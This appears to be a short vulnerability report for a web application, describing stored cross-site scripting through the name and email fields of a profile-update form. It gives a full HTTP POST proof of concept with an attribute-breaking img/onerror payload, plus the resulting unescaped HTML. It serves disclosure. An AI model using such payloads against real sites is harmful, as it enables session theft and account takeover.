In the modified name XSS attacks with the location of the mailbox #5
Description
Place in modify the name and email insert test code will be executed after landing page
POC:
`
- POST /update_personal_infomation HTTP/1.1
- Host: 127.0.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
- Accept: */*
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://172.16.125.115/admin
- Content-Length: 80
- Cookie: PHPSESSID=ch6ursnieofju1mqn02n02ri64
- Connection: close
-
- realname="><img src=xss onerror=alert(1)>&email="><img src=xss onerror=alert(1)>
location:
<div class="modal-body">
<form class="form-horizontal">
<div class="form-group">
<label for="realname" class="col-sm-2 control-label">姓名</label>
<div class="col-sm-10">
<input type="text" class="form-control" id="realname"
value=""><img src=xss onerror=alert(1)>"/>
</div>
</div>
<div class="form-group">
<label for="email" class="col-sm-2 control-label">邮箱</label>
<div class="col-sm-10">
<input type="email" class="form-control" id="email"
value=""><img src=xss onerror=alert(1)>"/>
</div>
</div>
`